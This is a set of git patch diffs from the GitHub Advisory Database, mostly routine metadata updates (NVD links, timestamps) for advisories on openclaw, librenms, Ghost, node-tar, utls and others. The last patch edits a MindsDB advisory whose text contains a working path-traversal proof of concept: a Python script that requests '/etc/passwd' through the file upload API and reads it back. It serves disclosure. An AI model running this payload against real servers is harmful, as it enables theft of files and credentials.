--- a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json +++ b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-37gc-85xm-2ww6", - "modified": "2026-02-18T22:44:33Z", + "modified": "2026-02-20T16:47:40Z", "published": "2026-02-18T22:44:33Z", "aliases": [ "CVE-2026-27009" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37gc-85xm-2ww6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27009" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/3b4096e02e7e335f99f5986ec1bd566e90b14a7e" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:44:33Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json b/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json index 2bef5d5f5b39e..5bd15baa3a98e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json +++ b/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6hf3-mhgc-cm65", - "modified": "2026-02-18T22:43:53Z", + "modified": "2026-02-20T16:47:17Z", "published": "2026-02-18T22:43:53Z", "aliases": [ "CVE-2026-27004" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6hf3-mhgc-cm65" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27004" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/c6c53437f7da033b94a01d492e904974e7bda74c" 
@@ -57,6 +61,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:43:53Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json b/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json index 9ca7ca5d742ad..ea16d5b1f6fbf 100644 --- a/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json +++ b/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-83g3-92jg-28cx", - "modified": "2026-02-18T00:57:13Z", + "modified": "2026-02-20T16:47:48Z", "published": "2026-02-18T00:57:13Z", "aliases": [ "CVE-2026-26960" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960" + }, { "type": "WEB", "url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:57:13Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:53Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json b/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json index a2da831f289ad..3fa4c04591b06 100644 --- a/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json +++ b/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-chf7-jq6g-qrwv", - "modified": "2026-02-18T22:43:22Z", + "modified": "2026-02-20T16:47:10Z", "published": "2026-02-18T22:43:21Z", "aliases": [ "CVE-2026-27003" 
@@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chf7-jq6g-qrwv" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27003" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/cf69907015b659e5025efb735ee31bd05c4ee3d5" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:43:21Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json b/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json index d0d101df4d0a4..ce495c50e84bf 100644 --- a/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json +++ b/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fqx6-693c-f55g", - "modified": "2026-02-18T22:08:15Z", + "modified": "2026-02-20T16:48:24Z", "published": "2026-02-18T22:08:15Z", "aliases": [ "CVE-2026-27016" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-fqx6-693c-f55g" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27016" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19040" @@ -65,6 +69,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:08:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:55Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json b/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json index ab257864ba86b..de77227091003 100644 --- a/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json 
+++ b/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gqx7-99jw-6fpr", - "modified": "2026-02-18T22:07:06Z", + "modified": "2026-02-20T16:48:17Z", "published": "2026-02-18T22:07:06Z", "aliases": [ "CVE-2026-26987" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-gqx7-99jw-6fpr" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26987" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19038" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:07:06Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:54Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json b/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json index 2578f4468e1d9..df45017b2417f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json +++ b/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h7f7-89mm-pqh6", - "modified": "2026-02-18T22:44:18Z", + "modified": "2026-02-20T16:47:32Z", "published": "2026-02-18T22:44:18Z", "aliases": [ "CVE-2026-27008" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h7f7-89mm-pqh6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27008" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/2363e1b0853a028e47f90dcc1066e3e9809d65f1" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:44:18Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json b/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json index 9ac94bba72fb7..de4e69ba62a1a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json +++ b/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w235-x559-36mg", - "modified": "2026-02-18T22:42:42Z", + "modified": "2026-02-20T16:47:03Z", "published": "2026-02-18T22:42:42Z", "aliases": [ "CVE-2026-27002" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w235-x559-36mg" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27002" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/887b209db47f1f9322fead241a1c0b043fd38339" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:42:42Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json index 74a6a2ffb3f09..4a2dcdd19126d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json +++ b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w52v-v783-gw97", - "modified": "2026-02-18T21:50:23Z", + "modified": "2026-02-20T16:48:09Z", "published": "2026-02-18T21:50:23Z", "aliases": [ "CVE-2026-26980" 
@@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26980" + }, { "type": "WEB", "url": "https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91" @@ -60,6 +64,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-18T21:50:23Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:54Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json index 6d14735313222..e863c1ede50b2 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json +++ b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w7h5-55jg-cq2f", - "modified": "2026-02-18T21:45:06Z", + "modified": "2026-02-20T16:48:00Z", "published": "2026-02-18T21:45:06Z", "aliases": [ "CVE-2026-26974" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/Tygo-van-den-Hurk/Slyde/security/advisories/GHSA-w7h5-55jg-cq2f" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26974" + }, { "type": "WEB", "url": "https://github.com/Tygo-van-den-Hurk/Slyde/commit/e4c215b061e44fd2ead805de34d72642a710af60" @@ -47,6 +51,10 @@ { "type": "PACKAGE", "url": "https://github.com/Tygo-van-den-Hurk/Slyde" + }, + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/releases/tag/v0.0.5" } ], "database_specific": { @@ -56,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T21:45:06Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T01:16:00Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json b/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json index 452a86ebdb4cc..f99abfac22b0e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json +++ b/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xxvh-5hwj-42pp", - "modified": "2026-02-18T22:44:10Z", + "modified": "2026-02-20T16:47:26Z", "published": "2026-02-18T22:44:10Z", "aliases": [ "CVE-2026-27007" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xxvh-5hwj-42pp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27007" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/41ded303b4f6dae5afa854531ff837c3276ad60b" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:44:10Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file From f6494f1a4f4661254296f58a760f406893cd6eed Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:52:09 +0000 Subject: [PATCH 10/77] Publish Advisories GHSA-pmc3-p9hx-jq96 GHSA-5pqf-54qp-32wx GHSA-6xmx-xr9p-58p7 --- .../2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json | 8 ++++++-- .../2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json | 8 ++++++-- .../2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json | 8 ++++++-- 3 files changed, 18 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json b/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json index de8e5f675b2de..3025a6f960fc8 100644 
--- a/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json +++ b/advisories/github-reviewed/2025/04/GHSA-pmc3-p9hx-jq96/GHSA-pmc3-p9hx-jq96.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pmc3-p9hx-jq96", - "modified": "2026-02-18T23:34:53Z", + "modified": "2026-02-20T16:51:12Z", "published": "2025-04-23T14:43:44Z", "aliases": [ "CVE-2026-26994" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/refraction-networking/utls/security/advisories/GHSA-pmc3-p9hx-jq96" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26994" + }, { "type": "WEB", "url": "https://github.com/refraction-networking/utls/issues/181" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-04-23T14:43:44Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:16:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json index 39b124c867160..73c3c3c48bb22 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5pqf-54qp-32wx", - "modified": "2026-02-18T22:07:19Z", + "modified": "2026-02-20T16:51:51Z", "published": "2026-02-18T22:07:19Z", "aliases": [ "CVE-2026-26991" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26991" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19041" 
@@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:07:19Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:15:59Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json b/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json index 6644b4c8f35d5..52c2040a43f33 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json +++ b/advisories/github-reviewed/2026/02/GHSA-6xmx-xr9p-58p7/GHSA-6xmx-xr9p-58p7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6xmx-xr9p-58p7", - "modified": "2026-02-18T22:30:32Z", + "modified": "2026-02-20T16:50:54Z", "published": "2026-02-18T22:30:32Z", "aliases": [ "CVE-2026-26989" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-6xmx-xr9p-58p7" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26989" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19039" @@ -67,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:30:32Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:54Z" } } \ No newline at end of file From f0ae703719aa116dc60e7fef6a639be68f4a9dab Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:53:55 +0000 Subject: [PATCH 11/77] Publish Advisories GHSA-3ppc-4f35-3m26 GHSA-7m29-f4hw-g2vx GHSA-93fx-g747-695x --- .../2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json | 8 ++++++-- .../2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json | 8 ++++++-- .../2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json | 8 ++++++-- 3 files changed, 18 insertions(+), 6 deletions(-) 
diff --git a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json index c5475ba875463..e62b787b379c0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json +++ b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3ppc-4f35-3m26", - "modified": "2026-02-18T22:38:11Z", + "modified": "2026-02-20T16:52:14Z", "published": "2026-02-18T22:38:11Z", "aliases": [ "CVE-2026-26996" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996" + }, { "type": "WEB", "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5" @@ -56,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:38:11Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T03:16:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json b/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json index bc6b085a5779c..5116ac941a5d1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json +++ b/advisories/github-reviewed/2026/02/GHSA-7m29-f4hw-g2vx/GHSA-7m29-f4hw-g2vx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7m29-f4hw-g2vx", - "modified": "2026-02-18T22:33:18Z", + "modified": "2026-02-20T16:52:07Z", "published": "2026-02-18T22:33:18Z", "aliases": [ "CVE-2026-27017" 
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/refraction-networking/utls/security/advisories/GHSA-7m29-f4hw-g2vx"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27017"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/refraction-networking/utls/commit/24bd1e05a788c1add7f3037f4532ea552b2cee07"
@@ -60,6 +64,6 @@
 "severity": "LOW",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-18T22:33:18Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T03:16:01Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json b/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json
index b1c8b72181209..cea6ca4d42f29 100644
--- a/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json
+++ b/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-93fx-g747-695x",
- "modified": "2026-02-18T22:07:42Z",
+ "modified": "2026-02-20T16:51:59Z",
 "published": "2026-02-18T22:07:42Z",
 "aliases": [
 "CVE-2026-26992"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26992"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/librenms/librenms/pull/19042"
@@ -64,6 +68,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-18T22:07:42Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-20T03:16:00Z"
 }
 }
\ No newline at end of file
From 9e37ed428b8d7931673a18f2ebd2eff14e3b75df Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 20 Feb 2026 16:55:56 +0000
Subject: [PATCH 12/77] Publish GHSA-qqhf-pm3j-96g7
---
 .../2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json b/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json
index 5e49b10ba6950..d935cb378b4d6 100644
--- a/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json
+++ b/advisories/github-reviewed/2026/01/GHSA-qqhf-pm3j-96g7/GHSA-qqhf-pm3j-96g7.json
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-qqhf-pm3j-96g7", - "modified": "2026-01-20T18:22:20Z", + "modified": "2026-02-20T16:54:21Z", "published": "2026-01-12T16:10:55Z", "aliases": [ "CVE-2025-68472" ], "summary": "MindsDB has improper sanitation of filepath that leads to information disclosure and DOS", - "details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. Severity: High.\n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. 
Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.", + "details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. \n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. 
The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n4. Detailed report is available on BlueRock's blog: https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.", "severity": [ { "type": "CVSS_V3", @@ -51,6 +51,10 @@ { "type": "WEB", "url": "https://github.com/mindsdb/mindsdb/releases/tag/v25.11.1" + }, + { + "type": "WEB", + "url": "https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal" } ], "database_specific": { From 